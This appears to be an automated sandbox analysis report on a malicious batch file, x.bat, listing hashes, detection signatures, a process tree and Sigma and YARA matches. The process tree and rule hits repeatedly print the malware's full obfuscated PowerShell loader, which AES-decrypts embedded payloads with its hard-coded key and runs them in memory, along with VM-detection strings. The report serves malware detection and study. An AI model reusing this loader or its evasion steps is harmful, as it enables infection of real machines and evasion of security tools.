
Windows Analysis Report
x.bat

Overview

General Information

Sample name: x.bat
Analysis ID: 1574678
MD5: 3839596a3f33711abce263e7d890b2e9
SHA1: 185a35a99a20422843725342c374ebae76b76fdc
SHA256: ac0c9ad2975e52b69068d331e25c0f7e1aaa2976651794b1eeadf5a3529bcaf0
Tags: bat, user-lontze7

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5752 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 1852 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 3592 cmdline: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 3524 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dllhost.exe (PID: 5016 cmdline: C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • dllhost.exe (PID: 412 cmdline: C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • svchost.exe (PID: 2036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 1932 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
            • svchost.exe (PID: 2064 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2152 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1824 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1840 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1940 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1948 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1956 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • cmd.exe (PID: 6756 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4088 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6996 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 6072 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 1368 cmdline: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 4544 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • schtasks.exe (PID: 6816 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • IfMUlU.exe (PID: 6964 cmdline: "C:\Windows\$nya-onimai2\IfMUlU.exe" MD5: B943A57BDF1BBD9C33AB0D33FF885983)
No configs have been found
Source: Process Memory Space: powershell.exe PID: 4544, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x51405:$b2: ::FromBase64String(
  • 0x51463:$b2: ::FromBase64String(
  • 0xc2676:$b2: ::FromBase64String(
  • 0xc305d:$b2: ::FromBase64String(
  • 0xe5675:$b2: ::FromBase64String(
  • 0xfc3b:$s1: -join
  • 0x1205a:$s1: -join
  • 0x4b9fe:$s1: -join
  • 0x506e9:$s3: Reverse
  • 0xcad49:$s3: Reverse
  • 0xbe99:$s4: +=
  • 0xbeb8:$s4: +=
  • 0xbef3:$s4: +=
  • 0xbf10:$s4: +=
  • 0xbf4b:$s4: +=
  • 0xbfb7:$s4: +=
  • 0xc043:$s4: +=
  • 0xc151:$s4: +=
  • 0xde84:$s4: +=
  • 0xdea7:$s4: +=
  • 0x13316:$s4: +=

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] ('')); , CommandLine: cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.
Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4544, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 6816, ProcessName: schtasks.exe
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4544, TargetFilename: C:\Windows\$nya-onimai2\IfMUlU.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 5016, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2084, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 3524, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample, Integrated Neural Analysis Model: Matched 96.6% probability
Source: C:\Windows\$nya-onimai2\IfMUlU.exe, Joe Sandbox ML: detected
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000019.00000000.2095214528.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2283406583.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2281104121.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095161886.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.2278957605.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2095093033.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
